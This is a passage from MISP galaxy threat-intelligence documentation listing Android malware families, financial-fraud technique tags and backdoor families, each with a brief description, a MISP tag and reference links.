https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-4108-99

Tapjoy

Tapjoy is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Tapjoy"

Table 370. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052619-4702-99

Tapsnake

Tapsnake is a Trojan horse for Android phones that is embedded into a game. It tracks the phone’s location and posts it to a remote web service.

The tag is: misp-galaxy:android="Tapsnake"

Table 371. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2010-081214-2657-99

Tascudap

Tascudap is a Trojan horse for Android devices that uses the compromised device in denial of service attacks.

The tag is: misp-galaxy:android="Tascudap"

Table 372. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-121312-4547-99

Teelog

Teelog is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Teelog"

Table 373. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-040215-2736-99

Temai

Temai is a Trojan horse for Android applications that opens a back door and downloads malicious files onto the compromised device.

The tag is: misp-galaxy:android="Temai"

Table 374. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-091722-4052-99

Tetus

Tetus is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Tetus"

Table 375. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-012409-4705-99

Tgpush

Tgpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Tgpush"

Table 376. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-032816-0259-99

Tigerbot

Tigerbot is a Trojan horse for Android devices that opens a back door on the compromised device.

The tag is: misp-galaxy:android="Tigerbot"

Table 377. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-041010-2221-99

Tonclank

Tonclank is a Trojan horse that steals information and may open a back door on Android devices.

The tag is: misp-galaxy:android="Tonclank"

Table 378. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-061012-4545-99

Trogle

Trogle is a worm for Android devices that may steal information from the compromised device.

The tag is: misp-galaxy:android="Trogle"

Table 379. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-081213-5553-99

Twikabot

Twikabot is a Trojan horse for Android devices that attempts to steal information.

The tag is: misp-galaxy:android="Twikabot"

Table 380. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-062614-5813-99

Uapush

Uapush is a Trojan horse for Android devices that steals information from the compromised device. It may also display advertisements and send SMS messages from the compromised device.

The tag is: misp-galaxy:android="Uapush"

Table 381. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-040114-2910-99

Umeng

Umeng is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Umeng"

Table 382. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040307-5749-99

Updtbot

Updtbot is a Trojan horse for Android devices that may arrive through SMS messages. It may then open a back door on the compromised device.

The tag is: misp-galaxy:android="Updtbot"

Table 383. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-041611-4136-99

Upush

Upush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Upush"

Table 384. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-0733-99

Uracto

Uracto is a Trojan horse for Android devices that steals personal information and sends spam SMS messages to contacts found on the compromised device.

The tag is: misp-galaxy:android="Uracto"

Table 385. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-031805-2722-99

Uranico

Uranico is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Uranico"

Table 386. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-052803-3835-99

Usbcleaver

Usbcleaver is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Usbcleaver"

Table 387. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-062010-1818-99

Utchi

Utchi is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Utchi"

Table 388. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-2536-99

Uten

Uten is a Trojan horse for Android devices that may send, block, and delete SMS messages on a compromised device. It may also download and install additional applications and attempt to gain root privileges.

The tag is: misp-galaxy:android="Uten"

Table 389. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-092316-4752-99

Uupay

Uupay is a Trojan horse for Android devices that steals information from the compromised device. It may also download additional malware.

The tag is: misp-galaxy:android="Uupay"

Table 390. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-061714-1550-99

Uxipp

Uxipp is a Trojan horse that attempts to send premium-rate SMS messages to predetermined numbers.

The tag is: misp-galaxy:android="Uxipp"

Table 391. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-060910-5804-99

Vdloader

Vdloader is a Trojan horse for Android devices that opens a back door on the compromised device and steals confidential information.

The tag is: misp-galaxy:android="Vdloader"

Table 392. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-080209-1420-99

VDopia

VDopia is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="VDopia"

Table 393. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-1559-99

Virusshield

Virusshield is a Trojan horse for Android devices that claims to scan apps and protect personal information, but has no real functionality.

The tag is: misp-galaxy:android="Virusshield"

Table 394. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040810-5457-99

VServ

VServ is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="VServ"

Table 395. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052619-3117-99

Walkinwat

Walkinwat is a Trojan horse that steals information from the compromised device.

The tag is: misp-galaxy:android="Walkinwat"

Table 396. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-033008-4831-99

Waps

Waps is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Waps"

Table 397. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040406-5437-99

Waren

Waren is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Waren"

Table 398. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-5501-99

Windseeker

Windseeker is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Windseeker"

Table 399. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-101519-0720-99

Wiyun

Wiyun is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Wiyun"

Table 400. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-5646-99

Wooboo

Wooboo is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Wooboo"

Table 401. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-5829-99

Wqmobile

Wqmobile is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Wqmobile"

Table 402. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-4926-99

YahooAds

YahooAds is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="YahooAds"

Table 403. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-060621-3229-99

Yatoot

Yatoot is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Yatoot"

Table 404. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-031408-4748-99

Yinhan

Yinhan is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Yinhan"

Table 405. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-3350-99

Youmi

Youmi is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Youmi"

Table 406. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-4318-99

YuMe

YuMe is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="YuMe"

Table 407. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-060621-0322-99

Zeahache

Zeahache is a Trojan horse that elevates privileges on the compromised device.

The tag is: misp-galaxy:android="Zeahache"

Table 408. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2011-032309-5042-99

ZertSecurity

ZertSecurity is a Trojan horse for Android devices that steals information and sends it to a remote attacker.

The tag is: misp-galaxy:android="ZertSecurity"

Table 409. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2013-050820-4100-99

ZestAdz

ZestAdz is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="ZestAdz"

Table 410. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2014-052616-3821-99

Zeusmitmo

Zeusmitmo is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Zeusmitmo"

Table 411. Table References
Links
https://www.symantec.com/security_response/writeup.jsp?docid=2012-080818-0448-99

SLocker

The SLocker family is one of the oldest mobile lock screen and file-encrypting ransomware and used to impersonate law enforcement agencies to convince victims to pay their ransom.

The tag is: misp-galaxy:android="SLocker"

SLocker is also known as:

SMSLocker

Table 412. Table References
Links
http://blog.trendmicro.com/trendlabs-security-intelligence/mobile-ransomware-pocket-sized-badness/
http://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/

Loapi

A malware strain known as Loapi will damage phones if users don’t remove it from their devices. Left to its own means, this modular threat will download a Monero cryptocurrency miner that will overheat and overwork the phone’s components, which will make the battery bulge, deform the phone’s cover, or even worse. Discovered by Kaspersky Labs, researchers say Loapi appears to have evolved from Podec, a malware strain spotted in 2015.

The tag is: misp-galaxy:android="Loapi"

Table 413. Table References
Links
https://www.bleepingcomputer.com/news/security/android-malware-will-destroy-your-phone-no-ifs-and-buts-about-it/

Podec

Late last year, we encountered an SMS Trojan called Trojan-SMS.AndroidOS.Podec which used a very powerful legitimate system to protect itself against analysis and detection. After we removed the protection, we saw a small SMS Trojan with most of its malicious payload still in development. Before long, though, we intercepted a fully-fledged version of Trojan-SMS.AndroidOS.Podec in early 2015. The updated version proved to be remarkable: it can send messages to premium-rate numbers employing tools that bypass the Advice of Charge system (which notifies users about the price of a service and requires authorization before making the payment). It can also subscribe users to premium-rate services while bypassing CAPTCHA. This is the first time Kaspersky Lab has encountered this kind of capability in any Android-Trojan.

The tag is: misp-galaxy:android="Podec"

Table 414. Table References
Links
https://securelist.com/sms-trojan-bypasses-captcha/69169//

Chamois

Chamois is one of the largest PHA families in Android to date and is distributed through multiple channels. While much of the backdoor version of this family was cleaned up in 2016, a new variant emerged in 2017. To avoid detection, this version employs a number of techniques, such as implementing custom code obfuscation, preventing user notifications, and not appearing in the device’s app list. Chamois apps, which in many cases come preloaded with the system image, try to trick users into clicking ads by displaying deceptive graphics to commit WAP or SMS fraud.

The tag is: misp-galaxy:android="Chamois"

Table 415. Table References
Links
https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf
https://android-developers.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html

IcicleGum

IcicleGum is a spyware PHA family whose apps rely on versions of the Igexin ads SDK that offer dynamic code-loading support. IcicleGum apps use this library’s code-loading features to fetch encrypted DEX files over HTTP from command-and-control servers. The files are then decrypted and loaded via class reflection to read and send phone call logs and other data to remote locations.

The tag is: misp-galaxy:android="IcicleGum"

View relationships graph

IcicleGum has relationships with:

similar: misp-galaxy:android="Igexin" with estimative-language:likelihood-probability="likely"

Table 416. Table References
Links
https://blog.lookout.com/igexin-malicious-sdk
https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

BreadSMS

BreadSMS is a large SMS-fraud PHA family that we started tracking at the beginning of 2017. These apps compose and send text messages to premium numbers without the user’s consent. In some cases, BreadSMS apps also implement subscription-based SMS fraud and silently enroll users in services provided by their mobile carriers. These apps are linked to a group of command-and-control servers whose IP addresses change frequently and that are used to provide the apps with premium SMS numbers and message text.

The tag is: misp-galaxy:android="BreadSMS"

Table 417. Table References
Links
https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

JamSkunk

JamSkunk is a toll-fraud PHA family composed of apps that subscribe users to services without their consent. These apps disable Wi-Fi to force traffic to go through users' mobile data connection and then contact command-and-control servers to dynamically fetch code that tries to bypass the network’s WAP service subscription verification steps. This type of PHA monetizes their abuse via WAP billing, a payment method that works through mobile data connections and allows users to easily sign up and pay for new services using their existing account (i.e., services are billed directly by the carrier, and not the service provider; the user does not need a new account or a different form of payment). Once authentication is bypassed, JamSkunk apps enroll the device in services that the user may not notice until they receive and read their next bill.

The tag is: misp-galaxy:android="JamSkunk"

Table 418. Table References
Links
https://blog.fosec.vn/malicious-applications-stayed-at-google-appstore-for-months-d8834ff4de59
https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

Expensive Wall

Expensive Wall is a family of SMS-fraud apps that affected a large number of devices in 2017. Expensive Wall apps use code obfuscation to slow down analysis and evade detection, and rely on the JS2Java bridge to allow JavaScript code loaded inside a Webview to call Java methods the way Java apps directly do. Upon launch, Expensive Wall apps connect to command-and-control servers to fetch a domain name. This domain is then contacted via a Webview instance that loads a webpage and executes JavaScript code that calls Java methods to compose and send premium SMS messages or click ads without users' knowledge.

The tag is: misp-galaxy:android="Expensive Wall"

Table 419. Table References
Links
https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf
https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/

BambaPurple

BambaPurple is a two-stage toll-fraud PHA family that tries to trick users into installing it by disguising itself as a popular app. After install, the app disables Wi-Fi to force the device to use its 3G connection, then redirects to subscription pages without the user’s knowledge, clicks subscription buttons using downloaded JavaScript, and intercepts incoming subscription SMS messages to prevent the user from unsubscribing. In a second stage, BambaPurple installs a backdoor app that requests device admin privileges and drops a .dex file. This executable checks to make sure it is not being debugged, downloads even more apps without user consent, and displays ads.

The tag is: misp-galaxy:android="BambaPurple"

Table 420. Table References
Links
https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

KoreFrog

KoreFrog is a family of trojan apps that request permission to install packages and push other apps onto the device as system apps without the user’s authorization. System apps can be disabled by the user, but cannot be easily uninstalled. KoreFrog apps operate as daemons running in the background that try to impersonate Google and other system apps by using misleading names and icons to avoid detection. The KoreFrog PHA family has also been observed to serve ads, in addition to apps.

The tag is: misp-galaxy:android="KoreFrog"

Table 421. Table References
Links
https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

Gaiaphish

Gaiaphish is a large family of trojan apps that target authentication tokens stored on the device to abuse the user’s privileges for various purposes. These apps use base64-encoded URL strings to avoid detection of the command-and-control servers they rely on to download APK files. These files contain phishing apps that try to steal GAIA authentication tokens that grant the user permissions to access Google services, such as Google Play, Google+, and YouTube. With these tokens, Gaiaphish apps are able to generate spam and automatically post content (for instance, fake app ratings and comments on Google Play app pages)

The tag is: misp-galaxy:android="Gaiaphish"

Table 422. Table References
Links
https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

RedDrop

RedDrop can perform a vast array of malicious actions, including recording nearby audio and uploading the data to cloud-storage accounts on Dropbox and Google Drive.

The tag is: misp-galaxy:android="RedDrop"

Table 423. Table References
Links
https://www.bleepingcomputer.com/news/security/new-reddrop-android-spyware-records-nearby-audio/

HenBox

HenBox apps masquerade as others such as VPN apps, and Android system apps; some apps carry legitimate versions of other apps which they drop and install as a decoy technique. While some of legitimate apps HenBox uses as decoys can be found on Google Play, HenBox apps themselves are found only on third-party (non-Google Play) app stores. HenBox apps appear to primarily target the Uyghurs – a Turkic ethnic group living mainly in the Xinjiang Uyghur Autonomous Region in North West China. HenBox has ties to infrastructure used in targeted attacks, with a focus on politics in South East Asia. These attackers have used additional malware families in previous activity dating to at least 2015 that include PlugX, Zupdax, 9002, and Poison Ivy. HexBox apps target devices made by Chinese consumer electronics manufacture, Xiaomi and those running MIUI, Xiaomi’s operating system based on Google Android. Furthermore, the malicious apps register their intent to process certain events broadcast on compromised devices in order to execute malicious code. This is common practice for many Android apps, however, HenBox sets itself up to trigger based on alerts from Xiaomi smart-home IoT devices, and once activated, proceeds in stealing information from a myriad of sources, including many mainstream chat, communication and social media apps. The stolen information includes personal and device information.

The tag is: misp-galaxy:android="HenBox"

Table 424. Table References
Links
https://researchcenter.paloaltonetworks.com/2018/04/unit42-henbox-inside-coop/

MysteryBot

Cybercriminals are currently developing a new strain of malware targeting Android devices which blends the features of a banking trojan, keylogger, and mobile ransomware.

The tag is: misp-galaxy:android="MysteryBot"

View relationships graph

MysteryBot has relationships with:

similar: misp-galaxy:malpedia="MysteryBot" with estimative-language:likelihood-probability="likely"

Table 425. Table References
Links
https://www.bleepingcomputer.com/news/security/new-mysterybot-android-malware-packs-a-banking-trojan-keylogger-and-ransomware/

Skygofree

At the beginning of October 2017, we discovered new Android spyware with several features previously unseen in the wild. In the course of further research, we found a number of related samples that point to a long-term development process. We believe the initial versions of this malware were created at least three years ago – at the end of 2014. Since then, the implant’s functionality has been improving and remarkable new features implemented, such as the ability to record audio surroundings via the microphone when an infected device is in a specified location; the stealing of WhatsApp messages via Accessibility Services; and the ability to connect an infected device to Wi-Fi networks controlled by cybercriminals. We observed many web landing pages that mimic the sites of mobile operators and which are used to spread the Android implants. These domains have been registered by the attackers since 2015. According to our telemetry, that was the year the distribution campaign was at its most active. The activities continue: the most recently observed domain was registered on October 31, 2017. Based on our KSN statistics, there are several infected individuals, exclusively in Italy. Moreover, as we dived deeper into the investigation, we discovered several spyware tools for Windows that form an implant for exfiltrating sensitive data on a targeted machine. The version we found was built at the beginning of 2017, and at the moment we are not sure whether this implant has been used in the wild. We named the malware Skygofree, because we found the word in one of the domains.

The tag is: misp-galaxy:android="Skygofree"

View relationships graph

Skygofree has relationships with:

similar: misp-galaxy:malpedia="Skygofree" with estimative-language:likelihood-probability="likely"

Table 426. Table References
Links
https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/

BusyGasper

A new family of spyware for Android grabbed the attention of security researchers through its unusual set of features and their original implementation. Tagged BusyGasper by security experts at Kaspersky, the malware stands out through its ability to monitor the various sensors present on the targeted phone. Based on the motion detection logs, it can recognize the opportune time for running and stopping its activity.

The tag is: misp-galaxy:android="BusyGasper"

Table 427. Table References
Links
https://www.bleepingcomputer.com/news/security/unsophisticated-android-spyware-monitors-device-sensors/

Triout

Bitdefender says Triout samples they discovered were masquerading in a clone of a legitimate application, but they were unable to discover where this malicious app was being distributed from. The obvious guess would be via third-party Android app stores, or app-sharing forums, popular in some areas of the globe.

The tag is: misp-galaxy:android="Triout"

Table 428. Table References
Links
https://www.bleepingcomputer.com/news/security/new-android-triout-malware-can-record-phone-calls-steal-pictures/

AndroidOS_HidenAd

active adware family (detected by Trend Micro as AndroidOS_HidenAd) disguised as 85 game, TV, and remote control simulator apps on the Google Play store

The tag is: misp-galaxy:android="AndroidOS_HidenAd"

AndroidOS_HidenAd is also known as:

AndroidOS_HiddenAd

Table 429. Table References
Links
https://blog.trendmicro.com/trendlabs-security-intelligence/adware-disguised-as-game-tv-remote-control-apps-infect-9-million-google-play-users/

Razdel

The Banking Trojan found in Google Play is identified as Razdel, a variant of BankBot mobile banking Trojan. This newly observed variant has taken mobile threats to the next level incorporating: Remote access Trojan functions, SMS interception, UI (User Interface) Overlay with masqueraded pages etc.

The tag is: misp-galaxy:android="Razdel"

Table 430. Table References
Links
http://www.virusremovalguidelines.com/tag/what-is-bankbot
https://mobile.twitter.com/pr3wtd/status/1097477833625088000

attck4fraud

attck4fraud - Principles of MITRE ATT&CK in the fraud domain.

attck4fraud is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: Francesco Bigarella

Phishing

In the context of ATT&CK for Fraud, phishing is described as the sending of fraudulent emails to a large audience in order to obtain sensitive information (PII, credentials, payment information). Phishing is never targeted to a specific individual or organisation. Phishing tries to create a sense of urgency or curiosity in order to capture the victim.

The tag is: misp-galaxy:financial-fraud="Phishing"

Table 431. Table References
Links
https://blog.malwarebytes.com/cybercrime/2015/02/amazon-notice-ticket-number-phish-seeks-card-details/
https://www.bleepingcomputer.com/news/security/widespread-apple-id-phishing-attack-pretends-to-be-app-store-receipts/

Spear phishing

Spear phishing is the use of targeted emails to gain the trust of the target with the goal of committing fraud. Spear phishing messages are generally specific to the target and show an understanding of the target’s organisation structure, supply chain or business.

The tag is: misp-galaxy:financial-fraud="Spear phishing"

Table 432. Table References
Links
http://fortune.com/2017/04/27/facebook-google-rimasauskas/
https://www.ibtimes.co.uk/russian-hackers-fancy-bear-likely-breached-olympic-drug-testing-agency-dnc-experts-say-1577508

ATM skimming

ATM Skimming refers to the act of capturing the data stored on a bank cards (tracks) and the Personal Identification Number (PIN) associated to that card. Upon obtaining the data, the criminal proceeds to encode the same information into a new card and use it in combination with the PIN to perform illicit cash withdrawals. ATM Skimming is often achieved with a combination of a skimmer device for the card and a camera to capture the PIN.

The tag is: misp-galaxy:financial-fraud="ATM skimming"

Table 433. Table References
Links
https://krebsonsecurity.com/2015/07/spike-in-atm-skimming-in-mexico/
https://krebsonsecurity.com/2011/12/pro-grade-3d-printer-made-atm-skimmer/
https://krebsonsecurity.com/2017/08/dumping-data-from-deep-insert-skimmers/
https://krebsonsecurity.com/2016/06/atm-insert-skimmers-in-action/
https://krebsonsecurity.com/2014/11/skimmer-innovation-wiretapping-atms/
https://krebsonsecurity.com/2016/09/secret-service-warns-of-periscope-skimmers/
https://krebsonsecurity.com/2011/03/green-skimmers-skimming-green
https://blog.dieboldnixdorf.com/have-you-asked-yourself-this-question-about-skimming/

ATM Shimming

ATM Shimming refers to the act of capturing a bank card data accessing the EMV chip installed on the card while presenting the card to a ATM. Due to their low profile, shimmers can be fit inside ATM card readers and are therefore more difficult to detect.

The tag is: misp-galaxy:financial-fraud="ATM Shimming"

Table 434. Table References
Links
https://krebsonsecurity.com/2015/08/chip-card-atm-shimmer-found-in-mexico/
https://www.cbc.ca/news/canada/british-columbia/shimmers-criminal-chip-card-reader-fraud-1.3953438
https://krebsonsecurity.com/2017/01/atm-shimmers-target-chip-based-cards/
https://blog.dieboldnixdorf.com/atm-security-skimming-vs-shimming/

Vishing

The tag is: misp-galaxy:financial-fraud="Vishing"

POS Skimming

The tag is: misp-galaxy:financial-fraud="POS Skimming"

Social Media Scams

The tag is: misp-galaxy:financial-fraud="Social Media Scams"

Malware

The tag is: misp-galaxy:financial-fraud="Malware"

Account-Checking Services

The tag is: misp-galaxy:financial-fraud="Account-Checking Services"

ATM Black Box Attack

The tag is: misp-galaxy:financial-fraud="ATM Black Box Attack"

Insider Trading

The tag is: misp-galaxy:financial-fraud="Insider Trading"

Investment Fraud

The tag is: misp-galaxy:financial-fraud="Investment Fraud"

Romance Scam

The tag is: misp-galaxy:financial-fraud="Romance Scam"

Buying/Renting Fraud

The tag is: misp-galaxy:financial-fraud="Buying/Renting Fraud"

Cash Recovery Scam

The tag is: misp-galaxy:financial-fraud="Cash Recovery Scam"

Fake Invoice Fraud

The tag is: misp-galaxy:financial-fraud="Fake Invoice Fraud"

Business Email Compromise

The tag is: misp-galaxy:financial-fraud="Business Email Compromise"

Scam

The tag is: misp-galaxy:financial-fraud="Scam"

CxO Fraud

The tag is: misp-galaxy:financial-fraud="CxO Fraud"

Compromised Payment Cards

The tag is: misp-galaxy:financial-fraud="Compromised Payment Cards"

Compromised Account Credentials

The tag is: misp-galaxy:financial-fraud="Compromised Account Credentials"

Compromised Personally Identifiable Information (PII)

The tag is: misp-galaxy:financial-fraud="Compromised Personally Identifiable Information (PII)"

Compromised Intellectual Property (IP)

The tag is: misp-galaxy:financial-fraud="Compromised Intellectual Property (IP)"

SWIFT Transaction

The tag is: misp-galaxy:financial-fraud="SWIFT Transaction"

Fund Transfer

The tag is: misp-galaxy:financial-fraud="Fund Transfer"

Cryptocurrency Exchange

The tag is: misp-galaxy:financial-fraud="Cryptocurrency Exchange"

ATM Jackpotting

The tag is: misp-galaxy:financial-fraud="ATM Jackpotting"

Money Mules

The tag is: misp-galaxy:financial-fraud="Money Mules"

Prepaid Cards

The tag is: misp-galaxy:financial-fraud="Prepaid Cards"

Resell Stolen Data

The tag is: misp-galaxy:financial-fraud="Resell Stolen Data"

ATM Explosive Attack

The tag is: misp-galaxy:financial-fraud="ATM Explosive Attack"

Backdoor

A list of backdoor malware..

Backdoor is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: raw-data

WellMess

Cross-platform malware written in Golang, compatible with Linux and Windows. Although there are some minor differences, both variants have the same functionality. The malware communicates with a CnC server using HTTP requests and performs functions based on the received commands. Results of command execution are sent in HTTP POST requests data (RSA-encrypted). Main functionalities are: (1) Execute arbitrary shell commands, (2) Upload/Download files. The PE variant of the infection, in addition, executes PowerShell scripts. A .Net version was also observed in the wild.

The tag is: misp-galaxy:backdoor="WellMess"

View relationships graph

WellMess has relationships with:

similar: misp-galaxy:malpedia="WellMess" with estimative-language:likelihood-probability="likely"

Table 435. Table References
Links
https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html

Rosenbridge

The rosenbridge backdoor is a small, non-x86 core embedded alongside the main x86 core in the CPU. It is enabled by a model-specific-register control bit, and then toggled with a launch-instruction. The embedded core is then fed commands, wrapped in a specially formatted x86 instruction. The core executes these commands (which we call the 'deeply embedded instruction set'), bypassing all memory protections and privilege checks.

While the backdoor should require kernel level access to activate, it has been observed to be enabled by default on some systems, allowing any unprivileged code to modify the kernel.

The rosenbridge backdoor is entirely distinct from other publicly known coprocessors on x86 CPUs, such as the Management Engine or Platform Security Processor; it is more deeply embedded than any known coprocessor, having access to not only all of the CPU’s memory, but its register file and execution pipeline as well.

The tag is: misp-galaxy:backdoor="Rosenbridge"

Table 436. Table References
Links
https://www.bleepingcomputer.com/news/security/backdoor-mechanism-discovered-in-via-c3-x86-processors/
https://github.com/xoreaxeaxeax/rosenbridge
https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Christopher%20Domas/DEFCON-26-Christopher-Domas-GOD-MODE-%20UNLOCKED-hardware-backdoors-in-x86-CPUs.pdf

ServHelper

The purpose of the macro was to download and execute a variant of ServHelper that set up reverse SSH tunnels that enabled access to the infected host through the Remote Desktop Protocol (RDP) port 3389.

"Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to “hijack” legitimate user accounts or their web browser profiles and use them as they see fit," researchers from Proofpoint explain in an analysis released today.

The other ServHelper variant does not include the tunneling and hijacking capabilities and functions only as a downloader for the FlawedGrace RAT.

The tag is: misp-galaxy:backdoor="ServHelper"

Table 437. Table References
Links
https://www.bleepingcomputer.com/news/security/new-servhelper-backdoor-and-flawedgrace-rat-pushed-by-necurs-botnet/

Rising Sun

The Rising Sun backdoor uses the RC4 cipher to encrypt its configuration data and communications. As with most backdoors, on initial infection, Rising Sun will send data regarding the infected system to a command and control (C2) site. That information captures computer and user name, IP address, operating system version and network adapter information. Rising Sun contains 14 functions including executing commands, obtaining information on disk drives and running processes, terminating processes, obtaining file creation and last access times, reading and writing files, deleting files, altering file attributes, clearing the memory of processes and connecting to a specified IP address.

The tag is: misp-galaxy:backdoor="Rising Sun"

Table 438. Table References
Links
https://www.bluvector.io/threat-report-rising-sun-operation-sharpshooter/

SLUB

A new backdoor was observed using the Github Gist service and the Slack messaging system as communication channels with its masters, as well as targeting a very specific type of victim using a watering hole attack. The backdoor dubbed SLUB by the Trend Micro Cyber Safety Solutions Team who detected it in the wild is part of a multi-stage infection process designed by capable threat actors who programmed it in C++. SLUB uses statically-linked curl, boost, and JsonCpp libraries for performing HTTP request, "extracting commands from gist snippets," and "parsing Slack channel communication." The campaign recently observed by the Trend Micro security researchers abusing the Github and Slack uses a multi-stage infection process.

The tag is: misp-galaxy:backdoor="SLUB"

View relationships graph

SLUB has relationships with:

similar: misp-galaxy:tool="SLUB Backdoor" with estimative-language:likelihood-probability="likely"

Table 439. Table References
Links
https://www.bleepingcomputer.com/news/security/new-slub-backdoor-uses-slack-github-as-communication-channels/

Asruex

Since it first emerged in 2015, Asruex has been known for its backdoor capabilities and connection to the spyware DarkHotel. However, when we encountered Asruex in a PDF file, we found that a variant of the malware can also act as an infector particularly through the use of old vulnerabilities CVE-2012-0158 and CVE-2010-2883, which inject code in Word and PDF files respectively.

The tag is: misp-galaxy:backdoor="Asruex"

Table 440. Table References
Links
https://blog.trendmicro.com/trendlabs-security-intelligence/asruex-backdoor-variant-infects-word-documents-and-pdfs-through-old-ms-office-and-adobe-vulnerabilities/

FlowerPippi

The tag is: misp-galaxy:backdoor="FlowerPippi"

Table 441. Table References
Links
https://securityintelligence.com/news/ta505-delivers-new-gelup-malware-tool-flowerpippi-backdoor-via-spam-campaign/

Speculoos

FreeBSD-based payload, Speculoos was delivered by exploiting CVE-2019-19781, a vulnerability affecting the Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliances that allowed an adversary to remotely execute arbitrary commands. This vulnerability was first disclosed on December 17, 2019 via security bulletin CTX267679 which contained several mitigation recommendations. By January 24, 2020, permanent patches for the affected appliances were issued. Based on the spread of industries and regions, in addition to the timing of the vulnerability disclosure, we believe this campaign may have been more opportunistic in nature compared to the highly targeted attack campaigns that are often associated with these types of adversaries. However, considering the exploitation of the vulnerability in conjunction with delivery of a backdoor specifically designed to execute on the associated FreeBSD operating system indicates the adversary was absolutely targeting the affected devices.

The tag is: misp-galaxy:backdoor="Speculoos"

View relationships graph

Speculoos has relationships with:

used-by: misp-galaxy:threat-actor="APT41" with estimative-language:likelihood-probability="very-likely"

